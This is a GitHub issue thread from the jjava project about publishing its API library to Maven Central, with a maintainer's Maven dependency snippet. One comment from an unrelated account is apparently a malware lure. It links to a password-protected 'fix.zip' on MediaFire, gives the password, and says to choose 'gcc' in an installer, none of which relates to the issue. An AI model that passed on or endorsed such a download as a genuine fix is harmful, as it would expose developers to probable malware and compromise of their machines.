### ISSUE TITLE
Extract and publish JJava API library

### ISSUE THREAD

**Issue by stariy95** [dflib/jjava#36]
We need to publishing the JJava API to the maven central in order third-party libraries could use auto-bootstrap functionality (#28)
For the minimum footprint we could make a separate module with public API for that.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by stariy95** [comment]
Dependency to use: 
```xml
<dependency>
    <groupId>org.dflib.jjava</groupId>
    <artifactId>jupyter-jvm-basekernel</artifactId>
    <version>1.0-SNAPSHOT</version>
    <scope>provided</scope>
</dependency>
```
